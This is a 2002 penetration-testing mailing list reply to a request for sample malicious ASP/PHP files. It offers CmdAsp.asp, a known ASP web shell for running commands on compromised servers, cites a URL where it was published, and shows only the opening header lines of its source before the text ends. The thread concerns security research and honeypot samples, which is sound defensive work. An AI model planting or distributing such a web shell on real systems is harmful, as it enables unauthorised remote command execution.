Penetration Testing mailing list archives

Re: ASP Files

From: Javier Fernández-Sanguino Peña <jfernandez () germinus com>
Date: Tue, 10 Dec 2002 19:14:49 +0100

Ian Lyte wrote:

Hi All,

   I'm looking for some sample .asp / .php files (preferably some captured
from honeypots if at all possible) that are currently being uploaded on
compromised systems.
Well, this one was not captured from a honeypot, it's based on one published over there (in this same list and many other places) with some minor changes by me. I guess the original one is
http://www.securiteam.com/tools/CmdAsp_asp_checks_your_last_line_of_defense.html

Regards

Javi

PS: Try google to find more references to this one.
<%@ Language=VBScript %>
<%
'  File:    CmdAsp.asp